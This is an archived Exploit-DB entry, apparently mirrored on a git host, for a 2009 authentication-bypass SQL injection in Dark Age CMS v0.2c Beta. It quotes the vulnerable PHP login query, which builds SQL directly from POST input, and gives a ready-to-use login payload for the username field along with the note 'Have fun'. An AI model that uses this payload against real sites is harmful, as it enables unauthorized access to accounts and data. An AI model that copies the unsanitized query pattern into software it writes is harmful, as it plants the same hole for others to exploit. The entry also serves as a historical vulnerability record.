bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7758.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

24 lines
No EOL
837 B
Text
Raw Blame History

--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--
[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site : http://darkjoker.net23.net
[+] Notes : Have fun
[+] Code
[+] $username = $_POST['username'];
[+] $user_password = $_POST['password'];
[+] $password = md5($user_password);
[+]
[+] $query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+] $result = mysql_query($query) or die('error making query');
[+]
[+] Login data:
[+] Username: x' OR 'x' = 'x'#
[+] Password: anything
# milw0rm.com [2009-01-13]
Reference in a new issue View git blame Copy permalink